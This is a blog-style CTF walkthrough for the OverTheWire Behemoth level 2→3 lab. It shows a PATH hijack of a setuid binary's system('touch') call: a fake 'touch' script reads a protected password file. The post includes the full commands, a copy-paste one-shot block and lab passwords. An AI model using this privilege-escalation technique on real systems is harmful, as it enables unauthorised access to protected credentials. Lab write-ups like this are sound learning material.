About Me
Avatar
Part time CTF Player learn every day!!
🌠 I Love Hoshimachi Suisei!! 🌠
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Behemoth Level 2 → 3 tutorial!!

overthewire behemoth exploitation path-hijacking priv-esc walkthrough ctf linux beginner
Published on 31 Aug 2023

Login

Log in as behemoth2 using the password you obtained from Level 1 → 2.

ssh behemoth2@behemoth.labs.overthewire.org -p 2221
# password: eimahquuof

Task

The binary /behemoth/behemoth2 uses system("touch <pid>"). Our goal is to hijack the program’s call to touch so that it runs our own script instead, revealing the password for behemoth3.

A little bit of Theory

  • system() looks up executables according to the $PATH environment variable.
  • If we put our own directory first in $PATH and create a fake touch binary, the program will execute ours.
  • This is known as a PATH hijacking attack.
  • Our fake touch just calls cat /etc/behemoth_pass/behemoth3.

Solution

  1. Confirm program behavior with ltrace

    ltrace ./behemoth2

    You’ll see a call like:

    system("touch 17924")

    confirming it tries to execute touch.

  2. Create a fake touch

    mkdir /tmp/fake
cd /tmp/fake
echo "cat /etc/behemoth_pass/behemoth3" > touch
chmod 777 touch

  3. Prepend our directory to PATH

    export PATH=/tmp/fake:$PATH

  4. Run the vulnerable binary

    /behemoth/behemoth2

    Since $PATH points to our fake script first, it executes our touch, which prints the next password.

Password

This is the password from my run; if yours differs, use the one your terminal printed.

nietiediel

Troubleshooting

  • Still calling real touch → Make sure /tmp/fake is the first entry in $PATH.
  • Permission denied → Ensure your fake touch is executable (chmod +x touch).
  • No output → Your fake script must only contain: cat /etc/behemoth_pass/behemoth3

Copy-paste quick run (one shot)

ssh behemoth2@behemoth.labs.overthewire.org -p 2221
# password: eimahquuof

mkdir /tmp/fake && cd /tmp/fake
echo "cat /etc/behemoth_pass/behemoth3" > touch
chmod 777 touch
export PATH=/tmp/fake:$PATH

/behemoth/behemoth2
# → should print password for behemoth3

Congrats 🎉 You hijacked the system() call by overriding $PATH, tricked the binary into running your fake touch, and obtained the password for behemoth3!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨

Cinema

related posts

all tags

GOT-overwrite aboutme aead ai alphanumeric-shellcode apt argc0 argon2 aslr assembly asymmetric atoi automation backbox bandit base64 bash beginner behemoth binary binary-exploitation binary-to-ascii blackarch blind blind-sqli blogging blue-team bruteforce buffer-overflow buffer-overwrite c caesar canary capabilities checksec command-injection commonmark cookie cron crypto cryptography ctf cutter cyberchef cybersecurity defenders detection dev directory-traversal dnf docs drifter ecc education elf env envp exploitation finale forensics format-string formulaone frequency frequency-analysis gcc gdb getchar gfm ghidra github-pages governance gpg guide hashing hkdf http jekyll jmpbuf kali kasiski kdf kernel keylength kramdown krypton lab ld_preload leviathan lfi lfsr linux linux-syscall llmops log-poisoning ltrace manpage markdown maze memcpy mitigations mitmproxy mlops narnia natas networking newline-injection nonce nop-sled nx object-injection obsidian openssl osint overflow overthewire package-manager pacman parrot path path-hijacking pathname php pie pkc pki pointer-trick pqc priv-esc privilege-escalation provable-security pwn pwntools pyshark python race-condition radare2 rag randomness recon red-team redirect relro requests ret2env ret2libc reverse-engineering reversing ricing roadmap rop rot13 rsa scapy security seed seo serialization session setjmp-longjmp setuid shell shellcode smoke soc sockets sprintf sql-injection srop stack-canary stack-overflow strace strcmp strcpy streamcipher strings strncpy strtoul substitution suid suisei symlink symmetric terminal test threat-intel time-based tls troubleshooting tshark type-juggling ubuntu udp utumno vigenere virtualbox virtualization vmware vortex walkthrough web windows wireshark writing wsl x86
dash theme for Jekyll by bitbrain made with